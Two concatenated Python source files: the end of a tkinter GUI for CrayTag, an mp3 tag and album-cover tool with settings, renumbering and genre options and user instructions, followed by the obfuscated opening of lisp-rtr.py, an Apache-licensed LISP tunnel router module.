a232 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=470,text='Enter the name or names of the JPEG image files for the program to look for. If your album cover is named cover.jpg the program will look for that filename in the directory its scanning. The program scans each folder seperately, it will look for a different cover in each folder containing mp3 files. Place each image name on a seperate line as shown below.',font=('Helvetica', 10, 'bold'),justify=LEFT)
a232.place(bordermode=OUTSIDE,height=80, width=470,relx=1.0, rely=0.0, anchor=NE)
a24 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=130,justify=LEFT,text='Delete These Files.',font=('Helvetica', 14, 'bold'))
a24.place(bordermode=OUTSIDE,height=80, width=130,relx=0.0, rely=0.45, anchor=NW)
a242 = Label(ram.rt, fg='cyan',bg='#290066',wraplength=470,justify=LEFT,text='You can specify files for the program to delete while it is scanning your files. For example, maybe you have unused files in each folder and want to batch delete them. Enter each filename you want deleted as demonstrated below on each seperate line. By default the program doesnt delete anything unles you specify it to do so. No worries.',font=('Helvetica', 10, 'bold'))
a242.place(bordermode=OUTSIDE,height=80, width=470,relx=1.0, rely=0.45, anchor=NE)
def saveS():
if nuw.nu and nuw2.nu:
ram.rt.destroy()
ram.CoversToSearchFor=None
ram.FilesToDelete=None
nim.indo.config(text='Settings closed; no settings saved.')
ram.coffee=None
return
if nuw.nu == False and bw.get('1.0',END).replace('\n','').replace('\t','').strip() != '':
A=bw.get('1.0',END).strip().replace('\t','') # Album covers to search for.
if '\n' in A:
A=A.split('\n')
temp=[]
for t in A:
if t.strip()!='' and '.jp' in t.strip().lower():
if t.strip().lower().endswith('.jpg') or t.strip().lower().endswith('.jpeg'):
temp.append(str(t.strip().lower()))
if temp!=[]:
A=temp
else:
A=None
else:
if A.strip()!='' and '.jp' in A.strip().lower():
if A.strip().lower().endswith('.jpg') or A.strip().lower().endswith('.jpeg'):
A=[A.lower()]
else:
A=None
else:
A=None
if A!=None:
ram.CoversToSearchFor=A
else:
ram.CoversToSearchFor=None
else:
ram.CoversToSearchFor=None
if nuw2.nu == False and bw2.get('1.0',END).replace('\n','').replace('\t','').strip() != '':
A=bw2.get('1.0',END).strip() # Files to delete.
if '\n' in A:
A=A.split('\n')
temp=[]
for t in A:
if t.strip()!='':
temp.append(str(t.strip().lower()))
if temp!=[]:
A=temp
else:
temp=None
A=None
else:
A=[A.lower()]
if A!=None:
ram.FilesToDelete=A
else:
ram.FilesToDelete=None
else:
ram.FilesToDelete=None
ram.rt.destroy()
nim.indo.config(text='Settings Saved.')
ram.coffee=None
return
e4 = tkinter.Button(ram.rt,command=saveS,text ="Save Settings",anchor='c',font=('Helvetica', 14, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
e4.pack()
e4.place(bordermode=OUTSIDE, height=39.5, width=600,relx=1.0, rely=1.0, anchor=SE)
background_image7=tkinter.PhotoImage(data = img.D)
ram.rt.iconphoto(False, background_image7)
ram.rt.mainloop()
def star():
ram.NotifyMissingArtist=True
ram.NotifyMissingCover=True
ram.NotifyMissingAlbumName=True
ram.RenumberFilenames=True
ram.ResizeAlbumCoverSize=480,480
ram.ChangeAllGenres=False
ram.GenreToChangeTo="Pop"
ram.files=0
ram.rt=None
ram.coffee=None
ram.DontResiveJPG=False
ram.WillEmbedArt=True
ram.KeepBackup=True
ram.DeleteEmbedded=True
def mainCat(indo):
star()
nim.rt=tkinter.Tk()
root=nim.rt
root.withdraw()
root.config(background="#2d00b3")
def vin():
root.destroy()
try:
ram.rt.destroy()
except:
pass
ravage()
root.protocol('WM_DELETE_WINDOW', vin)
root.title('CrayTag '+ver.sion)
w = 600
h = 400
ws = root.winfo_screenwidth()
hs = root.winfo_screenheight()
x = (ws/2) - (w/2)
y = (hs/2) - (h/2)
root.geometry('%dx%d+%d+%d' % (w, h, x, y))
root.resizable(0, 0)
root.configure(background='#2d00b3')
can=tkinter.Canvas(root)
back=tkinter.PhotoImage(data = img.Q)
a = Label(root, bg='#2d00b3',image=back)
a.place(bordermode=OUTSIDE,height=200, width=400,relx=0, rely=0.0, anchor=NW)
back2=tkinter.PhotoImage(data = img.B)
a2 = Label(root, bg='#2d00b3',image=back2)
a2.place(bordermode=OUTSIDE,height=70, width=108,relx=0.483, rely=0.565, anchor=NW)
def Pompeii(rtds):
if ram.coffee==None:
nim.indo=d
settings()
else:
return
a2.bind('<Button-1>',Pompeii)
a2.bind('<Button-2>',Pompeii)
a2.bind('<Button-3>',Pompeii)
b = tkinter.Text(root,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12),insertbackground='#000066')
b.pack()
b.place(bordermode=OUTSIDE, height=25, width=300,relx=0, rely=0.5, anchor=NW)
b.insert("1.0", "Type or Select Path of Folder to Process.")
class nu:
nu=True
def mp(cdf):
if nu.nu:
nu.nu=False
b.delete('1.0',END)
d.config(text='Type or Select Path to Folder with Files to Process.')
b.bind('<Button-1>',mp)
b.bind('<Button-2>',mp)
b.bind('<Button-3>',mp)
def browser():
temp=browse_button()
if str(temp)=='':
d.config(text='Must Select a Valid Path!')
else:
if os.path.isdir(temp):
nu.nu=False
d.config(text='Path Selected.')
b.delete('1.0',END)
b.insert('1.0',str(temp))
c = tkinter.Button(root,text ="Browse",command=browser,anchor='c',font=('Helvetica', 12, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
c.pack()
c.place(bordermode=OUTSIDE, height=25, width=100,relx=0.5, rely=0.5, anchor=NW)
d = Label(root, text=indo,anchor='w',relief=SUNKEN,fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#0000ff", highlightthickness=4,font=('Helvetica', 11))
d.place(bordermode=OUTSIDE, height=33, width=397,relx=0, rely=1, anchor=SW)
class dui:
b=0
c=['Invalid','Incorrect','Wrong']
d=True
def smo():
temp=b.get('1.0',END)
temp=temp.replace('\n','').replace('\t','')
temp=temp.strip()
if temp=='' or temp=="Type or Select Path of Folder to Process.":
d.config(text='Must Specify Path! Try using Browse Button!')
return
if os.path.isdir(temp)==False:
if dui.d==True:
dui.d=False
d.config(text='Path is '+random.choice(dui.c))
dui.b=random.randint(0,5)
elif dui.b==1:
d.config(text='Path is Still '+random.choice(dui.c))
dui.b=random.randint(0,5)
elif dui.b==2:
d.config(text='Path is Still '+random.choice(dui.c)+'!')
dui.b=random.randint(0,5)
elif dui.b==3:
d.config(text='Darling, the Path is Still '+random.choice(dui.c)+'?')
dui.b=random.randint(0,5)
elif dui.b==4:
d.config(text=random.choice(['Darling!','Hmm?','Sorry!','Ugh!','Bleh!','Yuck!','Nope!','Nah!','Honey!','Shockingly!'])+' the Path is Still '+random.choice(dui.c)+'.')
dui.b=random.randint(0,5)
else:
d.config(text=random.choice(['Darling','Sorry','Ugh','Bleh','Yuck','Nope','Nah','Honey','Shockingly'])+' the Path is Still '+random.choice(dui.c)+'.')
dui.b=random.randint(0,5)
return
dui.d=True
try:
ram.rt.destroy()
except:
pass
try:
root.destroy()
except:
print('V2 error')
ram.rt=None
ram.KillThread=False
colaC(temp)
e = tkinter.Button(root,command=smo,text ="Start",anchor='c',font=('Helvetica', 14, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
e.pack()
e.place(bordermode=OUTSIDE, height=80, width=204,relx=1.0, rely=1.0, anchor=SE)
f = Label(root, text='Notify to Add Missing Album Artist',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
f.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.562, anchor=NW)
g = Label(root, text='Notify to Add Missing Album Cover',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
g.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.622, anchor=NW)
h = Label(root, text='Notify to Add Missing Album Name',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h.place(bordermode=OUTSIDE, height=25, width=250,relx=0, rely=0.682, anchor=NW)
i = Label(root, text='Resize Album Cover to:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
i.place(bordermode=OUTSIDE, height=25, width=170,relx=0, rely=0.742, anchor=NW)
choices = ['25x25','50x50','75x75','100x100','125x125','150x150','160x160','175x175','200x200','250x250','300x300','350x350','400x400','480x480','500x500','600x600','700x700','800x800','900x900','1000x1000']
tkvar = StringVar(root)
def setter(kilo):
temp=tkvar.get().split('x')
ram.ResizeAlbumCoverSize=(int(temp[0]),int(temp[1]))
d.config(text='Changed Cover Size to: '+' x '.join(temp))
popupMenu = OptionMenu(root, tkvar, *choices,command=setter)
popupMenu.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu.place(bordermode=OUTSIDE, height=25, width=110,relx=0.28, rely=0.742, anchor=NW)
tkvar.set(choices[13])
j = Label(root, text='or Custom:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
j.place(bordermode=OUTSIDE, height=25, width=90,relx=0.458, rely=0.742, anchor=NW)
def mull():
p.config(text=str(k.get()))
k = Spinbox(root, command=mull,from_=0, to=10000,relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
k.place(bordermode=OUTSIDE, height=25, width=60,relx=0.605, rely=0.742, anchor=NW)
def mulla(jhg):
mull()
k.bind('<KeyRelease>',mulla)
m = Label(root, text='x',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
m.place(bordermode=OUTSIDE, height=25, width=17,relx=0.705, rely=0.742, anchor=NW)
def setC():
temp=k.get()
try:
temp=int(temp)
except:
d.config(text='Alert: Must Enter only Numbers For Cover Size!')
return
if temp<=0:
d.config(text='Alert: Cover Size Must be Greater than 0.')
return
else:
ram.ResizeAlbumCoverSize=temp,temp
d.config(text='Saved Custom Cover Size: '+str(temp)+' x '+str(temp))
o = tkinter.Button(root,text ="Save Custom",command=setC,anchor='c',font=('Helvetica', 11, 'bold'),relief=RAISED,activebackground='#0000ff',activeforeground='black',fg='#00ffff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2)
o.pack()
o.place(bordermode=OUTSIDE, height=25, width=103,relx=1, rely=0.742, anchor=NE)
p = Label(root, text='0',relief=SUNKEN,anchor='w',fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
p.place(bordermode=OUTSIDE, height=25, width=59,relx=0.732, rely=0.742, anchor=NW)
def gray():
if str(chkValue.get()) == 'True':
ram.NotifyMissingArtist=True
d.config(text='Enabled Notify Missing Artist.')
else:
ram.NotifyMissingArtist=False
d.config(text='Disabled Notify Missing Artist.')
chkValue = tkinter.BooleanVar()
chkValue.set(True)
q = tkinter.Checkbutton(root, var=chkValue,command=gray,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.562, anchor=NW)
def gray2():
if str(chkValue2.get()) == 'True':
ram.NotifyMissingCover=True
d.config(text='Enabled Notify Missing Cover.')
else:
ram.NotifyMissingCover=False
d.config(text='Disabled Notify Missing Cover.')
chkValue2 = tkinter.BooleanVar()
chkValue2.set(True)
q2 = tkinter.Checkbutton(root, var=chkValue2,command=gray2,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q2.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.622, anchor=NW)
def gray3():
if str(chkValue3.get()) == 'True':
ram.NotifyMissingAlbumName=True
d.config(text='Enabled Notify Missing Album Name.')
else:
ram.NotifyMissingAlbumName=False
d.config(text='Disabled Notify Missing Album Name.')
chkValue3 = tkinter.BooleanVar()
chkValue3.set(True)
q3 = tkinter.Checkbutton(root, var=chkValue3,command=gray3,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q3.place(bordermode=OUTSIDE, height=25, width=40,relx=0.415, rely=0.682, anchor=NW)
r = Label(root, text='Renumber mp3 Filenames:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
r.place(bordermode=OUTSIDE, height=25, width=195,relx=0, rely=0.802, anchor=NW)
def gray4():
if str(chkValue4.get()) == 'True':
ram.RenumberFilenames=True
d.config(text='Enabled Filename Renumbering.')
else:
ram.RenumberFilenames=False
d.config(text='Disabled Filename Renumbering.')
chkValue4 = tkinter.BooleanVar()
chkValue4.set(True)
q4 = tkinter.Checkbutton(root, var=chkValue4,command=gray4,relief=SUNKEN,fg='#000099',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,activebackground='#b3b3ff',activeforeground='blue',font=('Helvetica', 12))
q4.place(bordermode=OUTSIDE, height=25, width=40,relx=0.325, rely=0.802, anchor=NW)
choices2 = ['01 - Example.mp3','01-Example.mp3','01- Example.mp3','01 Example.mp3','01Example.mp3','01. Example.mp3','01.Example.mp3','01_Example.mp3','01_ Example.mp3','01:Example.mp3','01 : Example.mp3','01)- Example.mp3','01 ~ Example.mp3','01~ Example.mp3','01~Example.mp3']
tkvar2 = StringVar(root)
def setter2(kilo):
if tkvar2.get()==choices2[0]:
maxx.div=' - '
elif tkvar2.get()==choices2[1]:
maxx.div='-'
elif tkvar2.get()==choices2[2]:
maxx.div='- '
elif tkvar2.get()==choices2[3]:
maxx.div=' '
elif tkvar2.get()==choices2[4]:
maxx.div=''
elif tkvar2.get()==choices2[5]:
maxx.div='. '
elif tkvar2.get()==choices2[6]:
maxx.div='.'
elif tkvar2.get()==choices2[7]:
maxx.div='_'
elif tkvar2.get()==choices2[8]:
maxx.div='_ '
elif tkvar2.get()==choices2[9]:
maxx.div=':'
elif tkvar2.get()==choices2[10]:
maxx.div=' : '
elif tkvar2.get()==choices2[11]:
maxx.div=')- '
elif tkvar2.get()==choices2[12]:
maxx.div=' ~ '
elif tkvar2.get()==choices2[13]:
maxx.div='~ '
elif tkvar2.get()==choices2[14]:
maxx.div='~'
else:
print('Codfish Error')
d.config(text='Set Renumber Style to: '+str(tkvar2.get()))
popupMenu2 = OptionMenu(root, tkvar2, *choices2,command=setter2)
popupMenu2.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu2["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu2.place(bordermode=OUTSIDE, height=25, width=161,relx=0.392, rely=0.802, anchor=NW)
tkvar2.set(choices2[3])
s = Label(root, text='Change all Genres to:',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
s.place(bordermode=OUTSIDE, height=25, width=160,relx=0, rely=0.862, anchor=NW)
choices3 = ['Dont Change','Acapella', 'Acid', 'Acid Jazz', 'Acid Punk', 'Acoustic', 'Alternative', 'Alternative Rock', 'Ambient','ASMR', 'Anime', 'Avantgarde', 'Ballad', 'Bass', 'Beat', 'Bebob', 'Big Band', 'Black Metal', 'Bluegrass', 'Blues', 'Booty Bass', 'BritPop', 'Cabaret', 'Celtic', 'Chamber Music', 'Chanson', 'Chorus', 'Christian Gangsta Rap', 'Christian Rap', 'Christian Rock', 'Classic Rock', 'Classical', 'Club', 'Comedy', 'Contemporary Christian', 'Country', 'Crossover', 'Cult', 'Dance', 'Dance Hall', 'Darkwave', 'Death Metal', 'Disco', 'Dream', 'Drum & Bass', 'Drum Solo', 'Duet', 'Easy Listening', 'Egypt', 'Electronic', 'Ethnic', 'Euro-House', 'Euro-Techno', 'Eurodance', 'Fast Fusion', 'Folk', 'Folk-Rock', 'Folklore', 'Freestyle', 'Funk', 'Fusion', 'Game', 'Gangsta', 'Goa', 'Gospel', 'Gothic', 'Gothic Rock', 'Grunge', 'Hard Rock', 'Hardcore', 'Heavy Metal', 'Hip-Hop', 'House', 'House', 'Humour', 'Indie', 'Industrial', 'Instrumental', 'Instrumental Pop', 'Instrumental Rock', 'JPop', 'Jazz', 'Jazz+Funk', 'Jungle', 'Latin', 'Lo-Fi', 'Meditative', 'Merengue', 'Metal', 'Musical', 'National Folk', 'Native US', 'Negerpunk', 'New Age', 'New Wave', 'Noise', 'Oldies', 'Opera', 'Other', 'Polka', 'Polsk Punk', 'Pop', 'Pop-Folk', 'Pop-Funk', 'Porn Groove', 'Power Ballad', 'Pranks', 'Primus', 'Progressive Rock', 'Psychadelic', 'Psychedelic Rock', 'Punk', 'Punk Rock', 'R&B', 'Rap', 'Rave', 'Reggae', 'Retro', 'Revival', 'Rhythmic Soul', 'Rock','Russian','Rpop','RusPop', 'Rock & Roll', 'Salsa', 'Samba', 'Satire', 'Showtunes', 'Ska', 'Slow Jam', 'Slow Rock', 'Sonata', 'Soul', 'Sound Clip', 'Soundtrack', 'Southern Rock', 'Space', 'Speech', 'Swing', 'Symphonic Rock', 'Symphony', 'Synthpop', 'Tango', 'Techno', 'Techno-Industrial', 'Terror', 'Thrash Metal', 'Top 40', 'Trailer', 'Trance', 'Tribal', 'Trip-Hop', 'Unknown', 'Vocal', 'Vocal']
tkvar3 = StringVar(root)
def setter3(kilo):
if tkvar3.get()==choices3[0]:
ram.ChangeAllGenres=False
d.config(text='Disabled Changing Genre.')
else:
ram.GenreToChangeTo=str(tkvar3.get())
ram.ChangeAllGenres=True
d.config(text='Will Change Genres to: '+ram.GenreToChangeTo)
popupMenu3 = OptionMenu(root, tkvar3, *choices3,command=setter3)
popupMenu3.config(relief=SUNKEN,fg='black',bg='#b3b3ff',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu3["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu3.place(bordermode=OUTSIDE, height=25, width=240,relx=0.26, rely=0.862, anchor=NW)
tkvar3.set(choices3[0])
scroll = Scrollbar(root)
scroll.place(relx=1, rely=0, anchor=NE,height=200, width=15)
vexx = Text(root, wrap=WORD, yscrollcommand=scroll.set)
dearWorld="""\n\n\n\n\n\n\n\n\n\n\nInstructions Below.\n
----------------------
Welcome to CrayTag """+ver.sion+"""
By: Dalton Overlin.
----------------------
These instructions will help you better understand CrayTag and how to use it.
----------------------
----------------------
Type or Select Path of Folder to Process (or "Browse" button)
----------------------
The text box allows you to manually type the path of the folder to be processed (meaning the folder holding mp3s for processing). The "Browse" button opens a GUI window to select the folder for processing. That way you don't have to manually type out the path.
----------------------
Notify to Add Missing Album Artist (Checkbox)
----------------------
When this option is checked, while the program is processing your mp3 files if it finds an album with no defined artist name it will pop-up asking you to add the missing artist name. If you uncheck the box it will not notify you to add the missing data.
----------------------
Notify to Add Missing Album Cover (Checkbox)
----------------------
When this option is checked, while the program is processing your mp3 files if it finds an album with no defined album cover it will pop-up asking you to add the missing album cover. If you uncheck the box it will not notify you to add the missing cover.
----------------------
Notify to Add Missing Album Name (Checkbox)
----------------------
When this option is checked, while the program is processing your mp3 files if it finds an album with no defined album name it will pop-up asking you to add the missing album name. If you uncheck the box it will not notify you to add the missing album name.
----------------------
Resize Album Cover to: (dropdown menu)
----------------------
It allows you to select the size for the album art to be resized to. This will be the size that either embedded or standalone album covers will be resized too. For this operation, you don't need to click the "Save Custom" button as changing the dropdown value immediately sets the value.
----------------------
or Custom: & "Save Custom" button (for custom album art size)
----------------------
This option allows you to set a custom album cover size by either typing a numeric value or by using the toggle option to increase or decrease the value. Once you've set the custom size you must click the "Save Custom" button for the custom album cover size to be set.
----------------------
Renumber mp3 Filenames: (checkbox)
----------------------
When this box is checked it will carry out the file renumbering process. If the box is not checked it will not renumber the files.
----------------------
Renumbering Example Style (Dropdown Menu)
----------------------
This dropdown menu will give you options for different renumbering styles to choose from.
----------------------
Change all Genres to: (dropdown menu)
----------------------
If you leave this option at "Don't Change" then the program will not change the genre of all files being processed. But if you do change the option, then all files that are processed by the program will be changed to the new genre.
----------------------
Delete Embedded (dropdown menu)
----------------------
By default this option is set to No, when set to No it will not remove embedded album art. If you set this option to Yes then all embedded album art in your mp3 files will be removed. This is a way of stripping all embedded album art.
----------------------
Resize JPG File (dropdown menu)
----------------------
By default this option is set to No, when set to No it will not resize external album art (external meaning album art stored as separate image files). If you set this option to Yes then all external album art will be resized.
----------------------
Embed Cover (dropdown menu)
----------------------
By default, this option is set to Yes when setting to Yes it will embed album art into mp3 files. If you set this option to No then-new album art will not be embedded into the mp3 files. This option does not strip embedded album covers, it just prevents the setting of new embedded album covers if set to No.
----------------------
Keep Backup (dropdown menu)
----------------------
By default, this option is set to Yes. This option controls whether or not a backup of an embedded album cover will be made before resizing. This is done by extracting embedded album art and storing it as an external image file. Yes means a backup will be made. No means a backup will not be made.
----------------------
Start (button)
----------------------
This button is notably larger than the rest and is located at the bottom right area of the main GUI window. Once you've defined a directory to process and optionally additional settings you simply click the "Start" button and it will start processing the files.
----------------------
Settings (button with fish image)
----------------------
This button opens up a new window that will give you additional options. There is an option to specify custom names for album covers to look for. While the second option in the settings menu will let you define files to be deleted during the scanning process. This means if you define a filename like "folder.jpg" to be deleted the program will delete that file if it comes across it during the scan process of the directory you define.
----------------------
Processing Window
----------------------
This window will display while the program is processing your files. It will display live feedback of the current albums it is processing. If you want to cancel the processing of files just click the X button at the top right of the window. Once you do it will pop-up asking you if you want to cancel the running processes.
----------------------
Feedback Area
----------------------
There is a small text area at the bottom left of the main program window. This text area will give you feedback whenever you change a setting. After processing file this text area will also hold data about how many files were processed.
"""
vexx.insert("1.0", dearWorld)
vexx.config(state=DISABLED,bg='#000099',fg='#00ffff')
vexx.place(bordermode=OUTSIDE, height=202, width=186,relx=0.975, rely=0, anchor=NE)
scroll.config(command=vexx.yview)
h4 = Label(root, text='Delete Embedded',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h4.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.5018, anchor=NW)
f5 = Label(root, text='Resive JPG File',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
f5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.562, anchor=NW)
g5 = Label(root, text='Embed Cover',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
g5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.622, anchor=NW)
h5 = Label(root, text='Keep Backup',relief=SUNKEN,anchor='w',fg='#b3b3ff',bg='#000099',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
h5.place(bordermode=OUTSIDE, height=25, width=142,relx=0.665, rely=0.682, anchor=NW)
choices5 = ['No dont resize JPG files.','Yes resize JPG files.']
tkvar5 = StringVar(root)
def setter5(kilo):
if tkvar5.get()==choices5[0] or tkvar5.get()=='No':
d.config(text='Wont resize JPG files used as cover.')
ram.DontResiveJPG=False
else:
d.config(text='Will resize JPG files used as cover.')
ram.DontResiveJPG=True
popupMenu5 = OptionMenu(root, tkvar5, *choices5,command=setter5)
popupMenu5.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu5["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu5.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.562, anchor=NW)
tkvar5.set('No')
choices6 = ['No dont embed album cover in mp3s.','Yes embed album cover in mp3s.']
tkvar6 = StringVar(root)
def setter6(kilo):
if tkvar6.get()==choices6[1] or tkvar6.get()=='Yes':
d.config(text='Will embed cover in mp3s.')
ram.WillEmbedArt=True
else:
d.config(text='Wont embed cover in mp3s.')
ram.WillEmbedArt=False
popupMenu6 = OptionMenu(root, tkvar6, *choices6,command=setter6)
popupMenu6.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu6["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu6.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.622, anchor=NW)
tkvar6.set('Yes')
choices7 = ['No dont keep backup, meaning dont store a JPG before resizing.','Yes keep backup, meaning dont delete JPG file.']
tkvar7 = StringVar(root)
def setter7(kilo):
if tkvar7.get()==choices7[1] or tkvar7.get()=='Yes':
d.config(text='Will keep backup by storing JPG before resizing embedded art.')
ram.KeepBackup=True
else:
d.config(text='Wont keep backup by storing JPG before resizing embedded art.')
ram.KeepBackup=False
popupMenu7 = OptionMenu(root, tkvar7, *choices7,command=setter7)
popupMenu7.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu7["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu7.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.682, anchor=NW)
tkvar7.set('Yes')
choices8 = ['No dont remove embedded album art.','Yes remove embedded album art.']
tkvar8 = StringVar(root)
def setter8(kilo):
if tkvar8.get()==choices8[0] or tkvar8.get()=='No':
d.config(text='Wont remove embedded album art.')
ram.DeleteEmbedded=False
ram.WillEmbedArt=True
else:
d.config(text='Will remove embedded album art.')
ram.DeleteEmbedded=True
ram.WillEmbedArt=False
popupMenu8 = OptionMenu(root, tkvar8, *choices8,command=setter8)
popupMenu8.config(relief=SUNKEN,fg='black',bg='#b3b3ff',anchor='w',highlightbackground="#000066", highlightcolor="#000066", highlightthickness=2,font=('Helvetica', 12))
popupMenu8["menu"].config(bg='#b3b3ff',font=('Helvetica', 13, 'bold'),fg='black')
popupMenu8.place(bordermode=OUTSIDE, height=25, width=62,relx=0.90, rely=0.5018, anchor=NW)
tkvar8.set('No')
background_image7=tkinter.PhotoImage(data = img.D)
root.iconphoto(False, background_image7)
root.deiconify()
root.mainloop()
mainCat('Notification Area: CrayTag '+ver.sion)
|
lisp-rtr.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-rtr.py
#
# This file performs LISP Reencapsualting Tunnel Router (RTR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import time
import select
import threading
import pcappy
import os
import copy
import commands
import binascii
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
II1iII1i = [ None , None , None ]
oO0oIIII = None
Oo0oO0oo0oO00 = None
i111I = None
II1Ii1iI1i = None
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )
OOo = None
Ii1IIii11 = None
Oooo0000 = None
if 22 - 22: Ii1I . IiII
I11 = [ ]
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
if 58 - 58: i11iIiiIii % I1Ii111
if 54 - 54: OOooOOo % O0 + I1IiiI - iII111i / I11i
iIiiI1 = None
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
